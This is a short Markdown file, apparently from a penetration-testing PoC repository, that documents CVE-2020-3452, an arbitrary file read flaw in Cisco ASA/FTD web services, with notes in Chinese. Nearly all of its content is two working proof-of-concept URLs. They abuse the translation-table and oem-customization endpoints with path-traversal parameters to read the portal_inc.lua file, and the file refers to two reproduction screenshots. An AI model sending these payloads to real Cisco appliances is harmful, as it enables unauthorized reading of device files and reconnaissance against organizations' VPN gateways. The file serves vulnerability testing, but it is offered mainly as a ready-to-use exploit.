Penetration_Testing_POC/CVE-2020-3452:Cisco_ASAFTD任意文件读取漏洞.md

23 lines
485 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

CVE-2020-3452Cisco_ASAFTD任意文件读取漏洞
POC:one:
```
For example to read "/+CSCOE+/portal_inc.lua" file. https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
```
漏洞复现情况如下:
![](./img/67.png)
POC:two:
```
https://<domain>/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
```
漏洞复现情况如下:
![](./img/68.png)